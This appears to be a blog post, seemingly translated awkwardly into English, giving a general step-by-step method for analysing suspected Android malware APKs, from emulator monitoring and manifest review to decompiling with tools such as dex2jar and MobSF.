Today, I will introduce to readers the basic steps to analyze a sample of malware on mobile. Here are the steps models analyzed my samples of malicious code. In this article I will focus on a detailed analysis of the steps, the tools used in that step. The following article I will focus on guiding you to install and use the tools in step.
We should create a copy for analysis to avoid affecting the samples analyzed.
Upon receiving the APK file is suspected of having malicious code, first we will proceed to install it on an environmental sample simulator to monitor the behavior and permission requires. The signs should be monitored include some prominent signs:
– Permission to requires the installation
– Subscribe to network traffic. (We can use Wireshark to monitor traffic on the line).
The first two signs done quite fast and intuitive. The only problem is network traffic monitoring difficult. By having the malicious code is programmed only to send information about the attacker in a certain time frame. Ending the first step we need to obtain information on the icon to see if something different from the original application (if malicious code is inserted into certain popular applications), the right to request the installation, and network traffic of equipment before and after you install the application on.
After completing the first step we conducted an analysis APK file. APK file is actually a ZIP file format files containing source code offering photos, icons, … of the inner form. To do this step we shall renew tail .apk file to .zip and extract just obtained. We get all the files contained in the compressed file .apk. We implemented view unzipped files. In addition to the inherent file format of android. In the APK files may contain executable malicious code to execute when the call to be installed or run files that have been modified tail to fool the system. Therefore we must consider carefully the APK file in the file.
End step 2 we need obtain a list of suspicious files contained in the sample APK files.
In this step we conducted the analysis of the sample manifest file. In the manifest file we need to pay attention to the following characteristics:
To achieve this we need the help of analytical tools. The tool is capable of view manifest file that you can use the following tools:
– SmaliViewer (This is strong stuff. The result is a very complete and detailed)
– MobSF an automated analysis tool also allows us to view the manifest section of the APK file.
Finish step 3 we obtained a list of the characteristics listed above. Pay attention to the permissions requested in the manifest file and the permissions required when installing (obtained in step 1) analysis of the permissions are dangerous or not. Need to assess the dangers of the permission being granted.
Perform analysis of java code form.
In the first step we must take in the form of files .dex initial APK file format for analysis jar. We can using dex2jar for exchange .dex to .jar.
View file .jar you can using tool:
We performed analysis of suspicious starting point from main or suspicious characteristics obtained from the above steps.
Ending the process of analyzing the code we need to get the program running stream. The action (code) exploit the information of the device and the destination of such information. Activities that may change the status of the device (change the root of the device).
After performing the analysis by hand one can use automated analysis tools and templates for dynamic analysis obtained more accurate results. Considering the elements missing in the analysis step. At this stage we can use two automated analysis tools are:
In the next post, I will show you how to work with these tools in detail.
Wait and see, bros. 😀